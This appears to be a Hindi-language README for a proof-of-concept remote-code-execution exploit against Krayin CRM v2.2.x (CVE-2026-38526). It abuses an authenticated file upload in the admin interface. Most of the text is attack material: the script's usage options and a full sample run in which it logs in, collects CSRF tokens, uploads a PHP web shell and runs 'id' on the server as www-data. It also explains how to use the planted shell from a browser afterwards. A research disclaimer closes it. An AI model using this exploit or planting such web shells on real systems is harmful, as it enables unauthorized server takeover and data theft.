
CVE-2026-38526 एक्सप्लॉइट | द्वारा infrar3d
infrar3d द्वारा शोषण किया गया
यह एक रिमोट कोड एक्सीक्यूशन (RCE) प्रूफ-ऑफ-कॉन्सेप्ट है जो विशेष रूप से Krayin CRM v2.2.x के लिए डिज़ाइन किया गया है, जो एक ओपन-सोर्स कस्टमर रिलेशनशिप मैनेजमेंट सिस्टम है। यह स्क्रिप्ट CRM के प्रशासनिक इंटरफ़ेस में फ़ाइल अपलोड कमज़ोरी का दोहन करके लक्ष्य सर्वर पर रिमोट कमांड निष्पादन प्राप्त करने की प्रक्रिया को स्वचालित करती है।
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND
Krayin CRM RCE Exploit
options:
-h, --help show this help message and exit
-rh, --rhost RHOST Remote host
-u, --username USERNAME
Username or E-mail
-p, --password PASSWORD
Password
-c, --command COMMAND
Command to execute
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'
[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
यह स्क्रिप्ट डिफ़ॉल्ट रूप से revshells.com से एक PHP cmd शेल अपलोड करती है।
शोषण के बाद आप इसे अपने ब्राउज़र में खोल सकते हैं और वेब पेज से कमांड भेज सकते हैं।
यह सॉफ़्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
आप सभी लागू कानूनों का पालन करने के लिए जिम्मेदार हैं। नैतिक और जिम्मेदारी से उपयोग करें।